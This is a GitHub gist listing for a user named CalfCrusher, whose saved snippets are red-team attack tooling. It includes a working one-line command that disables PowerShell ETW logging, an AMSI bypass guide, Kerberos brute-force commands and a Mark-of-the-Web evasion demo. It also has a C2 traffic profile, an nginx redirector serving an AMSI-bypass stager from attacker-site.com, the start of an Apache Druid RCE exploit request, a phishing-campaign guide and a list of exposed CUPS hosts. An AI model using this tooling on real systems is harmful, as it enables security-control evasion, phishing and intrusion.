Skip to content

Instantly share code, notes, and snippets.

View CalfCrusher's full-sized avatar
Pwning

Christopher CalfCrusher

Pwning
127 followers · 76 following
View GitHub Profile
@CalfCrusher
CalfCrusher / gist:94bde0bd870dee3ab617ed9c8a7c6306
Created June 26, 2023 21:42
XOR_string.sh
#!/bin/bash
# Function to XOR a string with a key
xor_string() {
local string=$1
local key=$2
local result=""
for ((i = 0; i < ${#string}; i++)); do
local char=${string:i:1}
@CalfCrusher
CalfCrusher / amsi-bypass.md
Created October 7, 2023 15:07 — forked from D3Ext/amsi-bypass.md
All methods to bypass AMSI (2022)

AMSI Bypass

To perform all this techniques you can simply try them by typing "Invoke-Mimikatz" into your powershell terminal, you'll notice that even if you haven't imported Mimikatz it will detect that as malicious. But if the AMSI is off or you avoid it, it just will say that "it's not recognized as the name of a cmdlet", so you could say that you've bypassed the AMSI

However some methods may be detected by the AV but most of them actually work without problem

Powershell downgrade

The first and worst way to bypass AMSI is downgrading powershell version to 2.0.

@CalfCrusher
CalfCrusher / KillETW.ps1
Created October 7, 2023 15:52 — forked from tandasat/KillETW.ps1
Disable ETW of the current PowerShell session
#
# This PowerShell command sets 0 to System.Management.Automation.Tracing.PSEtwLogProvider etwProvider.m_enabled
# which effectively disables Suspicious ScriptBlock Logging etc. Note that this command itself does not attempt
# to bypass Suspicious ScriptBlock Logging for readability.
#
[Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0)
@CalfCrusher
CalfCrusher / kerberos_attacks_cheatsheet.md
Created October 15, 2023 10:57 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@CalfCrusher
CalfCrusher / SimulateInternetZoneTest.ps1
Created November 7, 2023 00:18 — forked from mgraeber-rc/SimulateInternetZoneTest.ps1
Example highlighting why attackers likely choose ISO/IMG as a delivery mechanism - it evades SmartScreen because Mark-of-the-Web (MOTW) cannot be applied to non NTFS volumes
Add-Type -OutputAssembly hello.exe -TypeDefinition @'
using System;
public class Hello {
public static void Main(string[] Args) {
System.Console.WriteLine("Hello, world!");
System.Console.Read();
}
}
'@
@CalfCrusher
CalfCrusher / custom_amazon_empire_malleable.profile
Last active December 12, 2023 10:37
Amazon Empire C2 Custom Malleable profile
#
# Modified Amazon browsing traffic profile
#
set sleeptime "10000"; # Increased sleep time to 10 seconds
set jitter "500"; # Increased jitter to 500 milliseconds
set maxdns "255";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"; # Changed the User Agent
http-get {
@CalfCrusher
CalfCrusher / nginx_example_vhost
Created November 12, 2023 10:05
Nginx as redirector for payloads
limit_req_zone $binary_remote_addr zone=req_zone:10m rate=5r/m;
server {
root /var/www/attacker-site.com/html;
index index.html;
server_name attacker-site.com www.attacker-site.com;
location / {
try_files $uri $uri/ =404;
}
location = /bypassamsiandrequeststager.txt {
@CalfCrusher
CalfCrusher / CVE-2021-25646 POC
Created September 17, 2024 13:57 — forked from 0xf4n9x/CVE-2021-25646 POC
CVE-2021-25646 Apache Druid RCE POC
POST /druid/indexer/v1/sampler HTTP/1.1
Host: x.x.x.x:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/json
Content-Length: 1045
Connection: close
@CalfCrusher
CalfCrusher / Red Team Phishing with Gophish.md
Created September 27, 2024 08:58 — forked from Ridter/Red Team Phishing with Gophish.md

Red Team Phishing with Gophish

This guide will help you set up a red team phishing infrastructure as well as creating, perform and evaluate a phishing campaign. This is the basic lifecycle of your phishingn campaign:

+---------------------+
|Get Hardware         |   Order / setup a vServer
+---------------------+
+---------------------+
|Setup                |   Install Gophish & Mail Server
+---------------------+
@CalfCrusher
CalfCrusher / current.csv
Created September 27, 2024 16:05 — forked from evilsocket/current.csv
cups sample
We can't make this file beautiful and searchable because it's too large.
ip,user_agent
116.202.x.x,CUPS/2.2.10 (Linux 4.19.0-17-amd64; x86_64) IPP/2.0
212.235.x.x,CUPS/2.2.7 (Linux 4.15.0-213-generic; x86_64) IPP/2.0
202.188.x.x,CUPS/2.3.3op2 (Linux 5.10.0-23-amd64; x86_64) IPP/2.0
202.188.x.x,CUPS/2.3.3op2 (Linux 5.10.0-23-amd64; x86_64) IPP/2.0
5.9.x.x,CUPS/2.2.7 (Linux 5.3.0-64-generic; x86_64) IPP/2.0
147.203.x.x,CUPS/2.2.7 (Linux 4.15.0-176-generic; x86_64) IPP/2.0
60.191.x.x,CUPS/2.2.12 (Linux 5.3.0-64-generic; x86_64) IPP/2.0
64.62.x.x,CUPS/2.2.12 (Linux 5.3.0-64-generic; x86_64) IPP/2.0
103.234.x.x,CUPS/2.4.1 (Linux 5.15.0-118-generic; x86_64) IPP/2.0